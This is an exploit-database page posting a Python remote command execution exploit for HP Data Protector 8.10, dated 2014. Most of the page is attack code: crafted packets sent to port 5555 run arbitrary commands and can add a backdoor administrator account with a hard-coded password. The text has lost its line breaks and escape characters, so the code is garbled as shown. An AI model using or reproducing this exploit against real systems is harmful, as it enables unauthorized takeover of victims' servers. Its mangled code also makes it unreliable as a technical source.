Home / exploits HP Data Protection Manager 8.10 Remote Command Execution
Posted on 16 July 2014
#!/usr/bin/python # Exploit Title: HP-Data-Protector-8.10 Remote command execution. # Date: July 11 2014 # Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org # Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org # Contacts: polunchis@intrusionlabs.org and chanoc@intrusionlabs.org # Version: HP Data Protector manager 8.10 the last version # Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF # Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages # Thanks:To GOD for giving us wisdom # Description: # A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555. import socket import struct import sys #net user Poc l@bs.og /add shellusr = ("x00x00x01x3cxffxfex32x00x00x00x20x00x68x00x70x00" "x64x00x70x00x31x00x00x00x20x00x30x00x00x00x20x00" "x00x00x20x00x00x00x20x00x45x00x4ex00x55x00x00x00" "x20x00x31x00x31x00x00x00x20x00x45x00x58x00x45x00" "x43x00x5fx00x42x00x41x00x52x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00" "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00" "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x63x00x3ax00x5cx00x77x00x69x00" "x6ex00x64x00x6fx00x77x00x73x00x5cx00x73x00x79x00" "x73x00x74x00x65x00x6dx00x33x00x32x00x5cx00x63x00" "x6dx00x64x00x2ex00x65x00x78x00x65x00x00x00x20x00" "x00x00x20x00x2fx00x63x00x20x00x6ex00x65x00x74x00" "x20x00x75x00x73x00x65x00x72x00x20x00x50x00x6fx00" "x63x00x20x00x6cx00x40x00x62x00x73x00x2ex00x6fx00" "x67x00x20x00x2fx00x61x00x64x00x64x00x00x00x00x00") #net user local group Administrators Poc /add shellgrp = ("x00x00x01x56xffxfex32x00x00x00x20x00x68x00x70x00" "x64x00x70x00x31x00x00x00x20x00x30x00x00x00x20x00" "x00x00x20x00x00x00x20x00x45x00x4ex00x55x00x00x00" "x20x00x31x00x31x00x00x00x20x00x45x00x58x00x45x00" "x43x00x5fx00x42x00x41x00x52x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00" "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x41x00x41x00x41x00x41x00x00x00" "x20x00x41x00x41x00x41x00x41x00x00x00x20x00x41x00" "x41x00x41x00x41x00x00x00x20x00x41x00x41x00x41x00" "x41x00x00x00x20x00x63x00x3ax00x5cx00x77x00x69x00" "x6ex00x64x00x6fx00x77x00x73x00x5cx00x73x00x79x00" "x73x00x74x00x65x00x6dx00x33x00x32x00x5cx00x63x00" "x6dx00x64x00x2ex00x65x00x78x00x65x00x00x00x20x00" "x00x00x20x00x2fx00x63x00x20x00x6ex00x65x00x74x00" "x20x00x6cx00x6fx00x63x00x61x00x6cx00x67x00x72x00" "x6fx00x75x00x70x00x20x00x41x00x64x00x6dx00x69x00" "x6ex00x69x00x73x00x74x00x72x00x61x00x74x00x6fx00" "x72x00x73x00x20x00x50x00x6fx00x63x00x20x00x2fx00" "x61x00x64x00x64x00x00x00x00x00") def connect_target(target, port): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error as err: print "[-]Close Socket! CODE: %d MSG: %s" % (err[0], err[1]) return -1 try: sock.connect((target, port)) except socket.error as err: print "[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1]) return -1 return sock def send_recv_packet(sock, packet): sock.sendall(packet) res = sock.recv(4096) return res print """ [*] https://intrusionlabs.org """ print "[*] Choose a valid option" print """ [1] Run remote commands [2] Add Poc user to Administrators group with password l@bs.og """ opcion= raw_input("Choose an option i.e. 1 or 2: ") if opcion.isdigit(): opcion = int(opcion) if opcion == 1: ip_remota= raw_input("IP Address: ") port= raw_input("Port: ") command= raw_input("command: ") if port.isdigit(): port = int(port) else: print "Please provide a tcp port" objetivo = connect_target(ip_remota, port) if objetivo == -1: exit() OFFSET = 46 command = command.replace("\", "\\") command_tmno = chr(OFFSET + len(command)) shell = "x00x00x00" + command_tmno + "x32x00x01" + "x01x01x01" + "x01x01x00" + "x01x00x01" + "x00x01x00" + "x01x01x00" + "x2028x00" + "\x70x65x72" + "x6cx2ex65x78" + "x65x00 x2dx65" + "x73x79x73x74x65x6d" + "('%s')x00" % command print >> sys.stderr, "[+] Sending the payload with the command: '%s'" % command datos = send_recv_packet(objetivo, shell) # Parse the response back print >> sys.stderr, "[+] Output:" while True: # Get information about response tmno_respuesta = objetivo.recv(4) if not tmno_respuesta: break n = struct.unpack(">I", tmno_respuesta)[0] respuesta = objetivo.recv(n) respuesta = respuesta[5:].strip() respuesta = respuesta.replace(" ", "") respuesta = respuesta.replace("x00", "") if respuesta.upper().find("*RETVAL*") != -1: break print respuesta objetivo.close() print >> sys.stderr, "print [!] Port close... " elif opcion == 2: ip_remota= raw_input("IP Address: ") port= raw_input(" Port: ") if port.isdigit(): port = int(port) else: print "Please provide a tcp port" print " [*]Creating P0c user and try to add it to Administrators group" #Get information about response print " [*]Attempting to create Poc user and try to add it to Administrators group with password l@bs.og" for packet in [shellusr, shellgrp]: target = connect_target(ip_remota, port) if target == -1: exit() data = send_recv_packet(target, packet) print "[*]SERVER RESPONSE: " + data.split("xFFxFEx31x00x35x00x00x00x20x00")[1].lstrip("x07x00x01x00").rstrip("$") target.close() else: print "Please provide a valid option i.e. 1 or 2"
